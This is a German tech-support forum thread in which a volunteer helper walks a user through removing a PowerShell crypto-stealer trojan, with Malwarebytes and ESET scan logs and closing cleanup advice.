Ich kenne diese Malware schon seit einigen Monaten und wusste daher, womit wir es hier zu tun haben.
Generell hat das im Laufe der Jahre auch viel mit Erfahrung zu tun... man weiß, wonach man suchen muss.

Zudem "arbeitet" das Tool FRST anders als Antivirenprogramme und ist diesen in der Regel (insbesondere was die Reparaturmöglichkeiten angeht) überlegen... man muss sich allerdings damit auskennen... kein Tool für Laien.


Ich habe vor ca. 10 Jahren eine Art "Ausbildung" zum Entfernen von Malware gemacht... eine hier auf dem TB und eine auf BleepingComputer (Dauer: jeweils 9-12 Monate, mit diversen Übungen unter Aufsicht von Experten im Bereich Malware).

Seitdem entferne ich mit den verschiedensten Tools Malware von Systemen. Mittlerweile dürften es locker 3000+ Themen sein.




Ich würde gerne zur Kontrolle noch MBAM und ESET laufen lasssen.




Schritt 1
Führe Malwarebytes' AntiMalware (MBAM) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.





Schritt 2
Führe ESET Online Scanner (EOS) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.

Alt 24.10.2023, 23:48   #5
Pun99
 
drei Unbekannte Powershell Prozesse - Standard

drei Unbekannte Powershell Prozesse


Code:
ATTFilter
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 24.10.23
Scan-Zeit: 20:46
Protokolldatei: a11041bc-729d-11ee-8ce6-2cf05d26fc02.json

-Softwaredaten-
Version: 4.6.5.293
Komponentenversion: 1.0.2181
Version des Aktualisierungspakets: 1.0.76534
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 11 (Build 22621.2428)
CPU: x64
Dateisystem: NTFS
Benutzer: DESKTOP-06IS096\doppo

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 332447
Erkannte Bedrohungen: 0
In die Quarantäne verschobene Bedrohungen: 0
Abgelaufene Zeit: 2 Min., 19 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)

Registrierungswert: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Datei: 0
(keine bösartigen Elemente erkannt)

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

WMI: 0
(keine bösartigen Elemente erkannt)


(end)
Code:
ATTFilter
24.10.2023 21:56:02
Geprüfte Dateien: 791108
Erkannte Dateien: 3
Gesäuberte Dateien: 3
Prüfdauer gesamt 00:50:04
Prüfstatus: Abgeschlossen


C:\FRST\Quarantine\C\WINDOWS\System32\6764.tmp\6765.tmp.ps1	PowerShell/Filesponger.A Trojaner	durch Löschen gesäubert
C:\FRST\Quarantine\C\WINDOWS\System32\80B6.tmp\80B7.tmp.ps1	PowerShell/Filesponger.A Trojaner	durch Löschen gesäubert
C:\FRST\Quarantine\C\WINDOWS\System32\E7CD.tmp\E7CE.tmp.ps1	PowerShell/Filesponger.A Trojaner	durch Löschen gesäubert
Damit sollte es dann passen oder?

Vielen Dank für deine Zeit und den Link zum Tutorial.


Alt 25.10.2023, 13:37   #6
M-K-D-B
/// TB-Ausbilder
 
drei Unbekannte Powershell Prozesse - Standard

drei Unbekannte Powershell Prozesse


ESET hat nur die Quarantäne von FRST angemeckert, aber da waren die Dateien ja harmlos.




Schritt 1
Überprüfe dein System auf fehlende Windows Updates.
  • Folge dem Pfad Start > Einstellungen > Update und Sicherheit > Windows Update und klicke auf Nach Updates suchen.
  • Wähle alle angebotenen Kumulativen Updates bzw. Funktionsupdates aus, downloade und installiere sie.
  • Starte den Rechner zum Abschluss neu.
  • Wiederhole den Vorgang, bis keine neuen Updates mehr angezeigt werden.






Entfernung der verwendeten Tools
Führe KpRm gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.





Dann wären wir durch!
Wenn du keine Probleme mehr mit Malware hast, dann sind wir hier fertig. Deine Logdateien sind sauber.

Wenn Du möchtest, kannst Du hier sagen, ob du mit mir und meiner Hilfe zufrieden warst...
Vielleicht möchtest du das Forum mit einer kleinen Spende unterstützen.





Zum Schluss bitte unbedingt die Sicherheitsmaßnahmen lesen und umsetzen:

Lesestoff:
Anleitung: Maßnahmen zur Absicherung des Rechners



Hinweis:
Bitte gib mir eine kurze Rückmeldung, sobald du die oben verlinkten Informationen gelesen hast, alles erledigt ist und keine Fragen mehr vorhanden sind, so dass ich dieses Thema aus meinen Abos löschen kann.

Alt 29.10.2023, 13:49   #7
M-K-D-B
/// TB-Ausbilder
 
drei Unbekannte Powershell Prozesse - Standard

drei Unbekannte Powershell Prozesse


Wir sind froh, dass wir helfen konnten

Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema.

Jeder andere bitte hier klicken und ein eigenes Thema erstellen.

Thema geschlossen

Themen zu drei Unbekannte Powershell Prozesse
administrator, autorun, dateien, defender, explorer.exe, firefox, google, homepage, internet, microsoft, mozilla, openvpn, ordner, pdf, prozess, prozesse, realtek, registry, scan, services.exe, suche, svchost.exe, system, temp, treiber, windows


« Malwarebyte - Ransomwareschutz wird laufend ohne mein zutun deaktiviert | Affiliate-Müll ...Redirecting in Opera bei wenigen Portalen »


Ähnliche Themen: drei Unbekannte Powershell Prozesse


  1. Träges System, Veränderungen, mehrere unbekannte Prozesse
    Log-Analyse und Auswertung - 07.03.2015 (21)
  2. Verschiedene, unbekannte und nicht zu beendende Prozesse!
    Plagegeister aller Art und deren Bekämpfung - 10.07.2014 (9)
  3. Mehrere unbekannte Prozesse im Taskmanager - unter anderem Wurm
    Log-Analyse und Auswertung - 28.06.2014 (5)
  4. Drei unbekannte .exe's im Autostart - Trojaner?
    Plagegeister aller Art und deren Bekämpfung - 22.12.2012 (13)
  5. unbekannte Prozesse auf meinen Pc !
    Log-Analyse und Auswertung - 31.10.2010 (10)
  6. unbekannte Prozesse
    Plagegeister aller Art und deren Bekämpfung - 08.11.2009 (1)
  7. Internet langsam, drei Host-Prozesse in ZoneAlarm
    Log-Analyse und Auswertung - 27.02.2009 (1)
  8. viele unbekannte neue Prozesse
    Log-Analyse und Auswertung - 18.02.2009 (2)
  9. Trojaner, Pop-ups, unbekannte Prozesse
    Plagegeister aller Art und deren Bekämpfung - 15.11.2008 (9)
  10. Unbekannte Prozesse und Explorercrash
    Plagegeister aller Art und deren Bekämpfung - 05.04.2008 (1)
  11. unbekannte Prozesse
    Mülltonne - 16.07.2006 (1)
  12. unbekannte Prozesse nach Firewallinstallation
    Alles rund um Windows - 25.10.2005 (8)
  13. unbekannte prozesse am start
    Antiviren-, Firewall- und andere Schutzprogramme - 12.02.2005 (1)
  14. unbekannte Prozesse
    Plagegeister aller Art und deren Bekämpfung - 21.11.2004 (5)
  15. Unbekannte Prozesse (neben Gator)
    Log-Analyse und Auswertung - 18.09.2004 (1)
  16. Unbekannte Prozesse.
    Log-Analyse und Auswertung - 15.08.2004 (11)
  17. Alarm? Unbekannte Prozesse laufen
    Plagegeister aller Art und deren Bekämpfung - 06.06.2004 (4)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


Zum Thema drei Unbekannte Powershell Prozesse - Mein Name ist Matthias und ich werde dir bei der Analyse und Bereinigung deines Systems helfen. Das ist ein Trojaner, der Krypto-Währungen und Krypto-Währungs-Wallets stiehlt (Crypto-Stealer). Ich bereite ein Skript - drei Unbekannte Powershell Prozesse...
Archiv
Du betrachtest: drei Unbekannte Powershell Prozesse auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132